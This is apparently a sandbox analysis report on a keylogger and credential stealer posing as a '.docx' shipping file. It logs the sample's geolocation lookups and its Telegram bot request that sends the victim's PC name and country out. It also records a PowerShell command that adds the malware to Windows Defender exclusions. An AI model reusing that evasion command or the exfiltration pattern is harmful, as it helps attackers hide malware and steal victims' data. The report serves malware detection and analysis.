2024-12-17 07:33:14 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49736	104.21.67.152	443	6644	C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:33:16 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-17 07:33:17 UTC	878	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 07:33:16 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 409565 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dI4BTLBX39HhBN%2BulLjHfZI5SBDI%2F03HUabw30XXPSy9TcGvgEnTTsBkyrVX%2BU9GduHdjfuwEgSGOdM0XsmhJi6cttlu1I6n4uRwcNgUXnTBxvmS2yDcrFaq%2B50vTn6pfYE88biJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f35395d0dbc4363-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1571&min_rtt=1567&rtt_var=595&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1826141&cwnd=237&unsent_bytes=0&cid=59ffd02909713d84&ts=460&x=0"
2024-12-17 07:33:17 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49739	104.21.67.152	443	6644	C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:33:19 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-17 07:33:20 UTC	882	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 07:33:19 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 409568 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BlS8JV6pUyhtvV0EZ%2F7d0uZZRB3KoP3tk06uh7LdVwKK7OGZsTQsSHtoL26pcF%2BZyoiNy9au0tuMq0rELmUsRVcWS8igHTfik8UKzpkr%2Fn2cnugpvs2zxaF%2FWNEEAOJ%2B4IlVwzUO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f35396f68e642f2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1568&min_rtt=1564&rtt_var=595&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1826141&cwnd=222&unsent_bytes=0&cid=25e70fc843f4dca6&ts=487&x=0"
2024-12-17 07:33:20 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49741	104.21.67.152	443	6644	C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:33:22 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-17 07:33:23 UTC	882	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 07:33:22 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 409571 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N0PxlaPIP61jN%2Bcg9vYhzxiMiWa8dvG69hjmhlejIbjGVn9R9jkuUkmzIrEmiHA6uu%2BTOPQfDvrZo%2FYipgAMHyRitiRMc5IsmQA%2FZ3WaPSUAgw7SiQNJd93hk2ie%2BcM9FeObFt%2Bd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f353981dec67cf6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1795&min_rtt=1787&rtt_var=687&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1573275&cwnd=193&unsent_bytes=0&cid=d25a7510ecee5175&ts=456&x=0"
2024-12-17 07:33:23 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49744	104.21.67.152	443	6644	C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:33:25 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-17 07:33:26 UTC	878	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 07:33:25 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 409574 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1PDfbxQ4uIGNDvttkTMeoasX5vZmBIjHEwECJnIfkD%2BP2XgWcnADl1bDk8%2FdqwFzN02xoPCgDvxFyoa5SDTJe3nes2KUOpYnEe%2BcdkhUibsVKefe%2BXp5IWY8HzX8ibRXN1cW89aQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f353994aedc41e3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2048&min_rtt=2040&rtt_var=782&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1383886&cwnd=218&unsent_bytes=0&cid=2556e711074a6e4d&ts=452&x=0"
2024-12-17 07:33:26 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49749	104.21.67.152	443	6644	C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:33:28 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-17 07:33:28 UTC	874	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 07:33:28 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 409577 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uvZMl7gQ8xOKWInjVAtutMqoe%2F2zlGqQqTY%2BOPQHvirpdfskRWrREum33YvTlxf9zleMw6KGtskvfiLFYNYnC4PitFgJVd1KvAClDHH0TCrFKGwfjUHY5Qo1EmepKMo5YvBzP1EI"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3539a6ab4c41fb-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2045&min_rtt=2038&rtt_var=779&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1392465&cwnd=181&unsent_bytes=0&cid=f3ad954efe5adf6f&ts=451&x=0"
2024-12-17 07:33:28 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49752	104.21.67.152	443	6644	C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:33:31 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-17 07:33:31 UTC	880	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 07:33:31 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 409580 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I4pzcx124fCC%2FpW1%2FKfico6G%2B8YepL3bV5hmuR6nbOnnqingA%2Bop1IsqvP%2BkIFSe7Pb7F4JxTgTJESrRO6PmVAFlSqZWR5GRGv1YwIWc0LMaxuoHoRwKCfjhxKnwb9u0dvrepKFN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3539b8bd1b8c12-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1983&min_rtt=1979&rtt_var=751&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1449131&cwnd=177&unsent_bytes=0&cid=bbff2363426649b8&ts=467&x=0"
2024-12-17 07:33:31 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49755	104.21.67.152	443	6644	C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:33:34 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-17 07:33:34 UTC	882	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 07:33:34 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 409583 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZyN39PqzJgxNuRooiVginyJ2ZBxmGy2ha2cEOj3VXa%2FGvdFNg%2FAa16%2FzLf%2F5YzHhHAoXREJsT9fl7Vt4etXyexPqiVxNhEEjXss9FM%2FqEsrHGqAK513VcmTEucXb9fPodppTG%2BpO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3539cae82043d5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2350&min_rtt=2341&rtt_var=896&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1210111&cwnd=241&unsent_bytes=0&cid=dc2198af59ce2b32&ts=448&x=0"
2024-12-17 07:33:34 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49757	104.21.67.152	443	6644	C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:33:37 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-17 07:33:38 UTC	891	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 07:33:37 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 409586 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i%2FG5lJCsFczdwi%2BD7fWkIQZZ1D3%2BNoWG8w%2BFVPHGEq4rIQ95m5uBcvcQe5fudjwWnLwbNg2%2Fnym1W4sxRgFmxHClatzbO%2BX%2FkxBTR7ah3ZLmh5gm8WjVeA%2Fg7djjQ9x1PjBG5%2Brb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3539df9f91430e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=27737&min_rtt=2039&rtt_var=16131&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1432074&cwnd=186&unsent_bytes=0&cid=2c92d14b5521bdb4&ts=448&x=0"
2024-12-17 07:33:38 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49758	149.154.167.220	443	6644	C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:33:39 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2018/12/2024%20/%2006:26:01%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-12-17 07:33:40 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Tue, 17 Dec 2024 07:33:39 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-17 07:33:40 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Target ID:	0
Start time:	02:33:07
Start date:	17/12/2024
Path:	C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe"
Imagebase:	0x4e0000
File size:	906'240 bytes
MD5 hash:	BF49FB7C260B15A61C5849A49FDEE343
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	02:33:09
Start date:	17/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe"
Imagebase:	0xca0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	02:33:09
Start date:	17/12/2024
Path:	C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe"
Imagebase:	0xf00000
File size:	906'240 bytes
MD5 hash:	BF49FB7C260B15A61C5849A49FDEE343
